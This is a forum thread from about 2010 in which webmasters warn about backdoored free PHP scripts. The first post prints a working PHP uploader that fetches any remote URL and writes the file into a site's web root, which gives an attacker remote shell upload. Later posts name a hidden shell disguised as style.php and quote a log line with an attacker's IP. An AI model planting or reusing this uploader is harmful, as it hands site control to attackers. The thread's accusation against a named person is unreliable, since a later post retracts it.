Attention please!!!

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
    #1

    Attention please!!!

    Hello all wapmasters please dont download any script of Prem (Spicyfm.com). He is a hacker. Dont use Flat autoindex in your site. Spicyfm.com owner can hack ur site easily if you use Flat auto index or spicyfm script. I am a victiom of his script. use a script to modify your scripts. He changed my admob id everyday and add his id. Atleast hostgator support team helped me to caught this blade hacker. He use
    PHP Code:
    if(isset($_POST['dir'])) 


    $dir = "/"; 
    $file = $_POST['url']; 
    $name = $_POST['nname']; 
    if($content = file_get_contents($file)) 

    $fp = fopen($dir.'/'.$name, 'w'); 
    fwrite($fp, $content); 
    fclose($fp); 
    }} 

    and use a form to modify your script. 
    <?php 

    if(isset($_POST['submit'])) 

    //change dir name nd chmod to 777 
    $dir "/home/steve856/public_html/"
    $file $_POST['url']; 
    $name $_POST['nname']; 
    if(    $content file_get_contents($file)) 

    $fp fopen($dir.'/'.$name'w'); 
    fwrite($fp$content); 
    fclose($fp); 
    print     "done"

    else 

    print     "unable to fetch file."



    else 

    print     "<form method='post' action='~display_no.php'> 
    <b>URL:</b><br> 
    <input type='text' name='url'><br> 
    <b>New Filename:</b><br> 
    <input type='text' name='nname'><br> 
    <input type='submit' name='submit' value='Upload'></form><br>"
    print     "Powered by "


    ?>

    Last edited by metulj; 22.01.10, 20:59. Reason: learn to post code in [ php ] tag [ / php ]
    Tags: None
    #2
    freeware scripts are vuln to be hack and crap hehe

    Comment

      #3
      steve thanks for the info, by the way that is why its very nice to do our script than to use others script, what i mean is use the very old script then mod it one by one. then if you can make one then that is nice even me im using others script LOL!
      Did I help you?
      You can help me too
      Your donations will help me finance my studies.

      Comment

        #4
        Originally posted by kei_ki7 View Post
        steve thanks for the info, by the way that is why its very nice to do our script than to use others script, what i mean is use the very old script then mod it one by one. then if you can make one then that is nice even me im using others script LOL!

        sounds good to me...... hehe lol

        Comment

          #5
          Thanks For ur Good info..........

          Comment

            #6
            script is Remote Shell Upload vulnerable.. that's why he can hack u..
            Last edited by thanatos; 22.01.10, 09:30.

            Comment

              #7
              put allow url fopen OFF ...serach on google for more
              Unamos los corazones,hoy todos somos multicolores!

              Comment

                #8
                Thank for ur info steve...

                Comment

                  #9
                  Hello guys,
                  Spicyfm.com owner is not hacker. it was mistake of hostgator. Today my site was hacked again.
                  *****no need to spam here !*****
                  i had conversation with Prem. I actually dont know who is doing this.
                  Last edited by metulj; 22.01.10, 21:01.

                  Comment

                    #10
                    steve remove ur youtube script , coz i was also facing prblm like that but hostgator found real problem . in youtube script he add style.php that is shell , nd i want to share IP of that person who doing this 203.196.249.171 IN India 16 Maharashtra ,

                    Comment

                      #11
                      Exmple

                      Please re-edit your files. Check your source files and for updates to the application located in /tube/

                      PHP shell located inside your /tube/ directory. This file has been inside the account since 10/29/09.

                      /home/tube]# ll style.php
                      -rw-r--r-- 1 sahib sahib 20239 Oct 29 02:46 style.php


                      203.196.249.171 - - [27/Jan/2010:12:28:57 -0600] "POST /tube/style.php?act=filemanager HTTP/1.1" 200 48790 "http://desimob.net/tube/style.php?act=filemanager" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10"
                      [

                      Comment

                        #12
                        thanx mate

                        Comment

                        Previous template Next
                        Working...
                        X